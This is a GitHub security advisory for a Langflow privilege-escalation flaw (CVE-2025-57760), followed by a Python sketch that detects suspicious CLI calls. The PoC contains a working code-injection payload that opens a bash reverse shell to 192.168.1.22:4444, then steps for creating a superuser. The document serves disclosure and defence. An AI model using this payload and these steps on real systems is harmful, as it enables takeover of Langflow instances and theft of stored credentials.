CVE-2025-57760 – langflow
Package
Manager: pip
Name: langflow
Vulnerable Version: >=0 <=1.5.0
Severity
Level: High
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS: 0.00041 (percentile: 0.11549)
Details
Langflow Vulnerable to Privilege Escalation via CLI Superuser Creation (Post-RCE)

This vulnerability was discovered by researchers at **Check Point**. We are sharing this report as part of a responsible disclosure process and are happy to assist in validation and remediation if needed.

### Summary

A privilege escalation vulnerability exists in Langflow containers where an authenticated user with RCE access can invoke the internal CLI command **langflow superuser** to create a new administrative user. This results in full superuser access, even if the user initially registered through the UI as a regular (non-admin) account.

### Details

Langflow's Docker image includes a CLI binary at `/app/.venv/bin/langflow` that exposes sensitive commands, including:

`langflow superuser`

This command allows creation of a new superuser without checking whether one already exists. When combined with code execution (e.g., via the authenticated **/api/v1/validate/code** endpoint), a low-privileged user can execute:

`/app/.venv/bin/langflow superuser`

inside the container, and elevate themselves to full superuser privileges. This effectively bypasses frontend role enforcement and backend user integrity, leading to full compromise of the Langflow application.

### PoC

1. Start container with `LANGFLOW_ENABLE_AUTH` set to True.

2. Visit http://localhost:7860 and sign up. (Your user will not be marked `is_superuser`.)

   <img width="1311" height="627" alt="image" src="https://github.com/user-attachments/assets/9b75bdc3-31ea-48c0-9e84-c2b168f404b3" />

3. Exploit `/api/v1/validate/code` to get reverse shell. Send an authenticated POST request:

   ```
   {
     "code": "def foo(p=__import__('os').system(\"bash -c 'bash -i >& /dev/tcp/192.168.1.22/4444 0>&1'\")):\n pass"
   }
   ```

4. Inside reverse shell, create superuser:

   <img width="731" height="217" alt="image" src="https://github.com/user-attachments/assets/cb8497c6-0d61-414e-afe2-69bbbaf55cbc" />

5. Log into UI as new superuser:

   <img width="1262" height="532" alt="image" src="https://github.com/user-attachments/assets/1f0a713d-3d61-4aa4-a25b-58f4b58c061b" />

### Impact

- Privilege escalation to superuser — complete takeover of the Langflow instance
- Access to all user data, flows, stored credentials, and configuration
- Credential leakage — attacker can extract third-party API keys
- Exposure of environment variables (inside docker container)
- Ability to run additional Langflow instances via `langflow run` inside the container, which may lead to resource exhaustion (CPU, memory) and service degradation.
- Full user management — superuser can delete other users, reset their passwords
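A detection sketch for the escalation path described above, added here as an example and not taken from the advisory or the Langflow project: it flags `langflow superuser` (and a second `langflow run`) when the call descends from the running server process, which separates in-application code execution from an operator running the CLI directly. The event field names, the sample records and the assumption that the server is started as `langflow run` are constructed for illustration.

```python
import json
import os

# Constructed exec events; the field names are assumptions, shaped like the
# output of a process-exec sensor. pid 7 is the long-running server.
SAMPLE_EVENTS = """\
{"pid": 7, "ppid": 1, "argv": ["/app/.venv/bin/langflow", "run"]}
{"pid": 40, "ppid": 7, "argv": ["sh", "-c", "constructed-child-command"]}
{"pid": 41, "ppid": 40, "argv": ["bash"]}
{"pid": 52, "ppid": 41, "argv": ["/app/.venv/bin/langflow", "superuser"]}
{"pid": 90, "ppid": 0, "argv": ["langflow", "superuser"]}
{"pid": 95, "ppid": 41, "argv": ["/app/.venv/bin/langflow", "run"]}
"""

# Subcommands the advisory names as abusable from inside the container.
WATCHED = {"superuser", "run"}


def langflow_subcommand(argv):
    """Return the subcommand if argv invokes the langflow CLI, else None."""
    if len(argv) >= 2 and os.path.basename(argv[0]) == "langflow":
        return argv[1]
    return None


def find_suspicious(events_text):
    """Return (pid, subcommand, server_pid) for watched CLI calls that
    descend from a running `langflow run` server process."""
    events = [json.loads(line) for line in events_text.splitlines() if line.strip()]
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        sub = langflow_subcommand(e["argv"])
        if sub not in WATCHED:
            continue
        seen = set()  # guards against pid loops in malformed data
        parent = by_pid.get(e["ppid"])
        while parent and parent["pid"] not in seen:
            seen.add(parent["pid"])
            if langflow_subcommand(parent["argv"]) == "run":
                findings.append((e["pid"], sub, parent["pid"]))
                break
            parent = by_pid.get(parent["ppid"])
    return findings


if __name__ == "__main__":
    for pid, sub, server in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT pid={pid}: 'langflow {sub}' spawned under server pid={server}")
```

The server's own `langflow run` (pid 7) and the operator-launched `langflow superuser` (pid 90, no server ancestor) are not flagged; invocations through `python -m langflow` are outside what this sketch matches.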
Metadata
Created: 2025-08-25T16:21:04Z
Modified: 2025-08-25T16:21:04Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-4gv9-mp8m-592r/GHSA-4gv9-mp8m-592r.json
CWE IDs: ["CWE-269"]
Alternative ID: GHSA-4gv9-mp8m-592r
Finding: F159
Auto approve: 1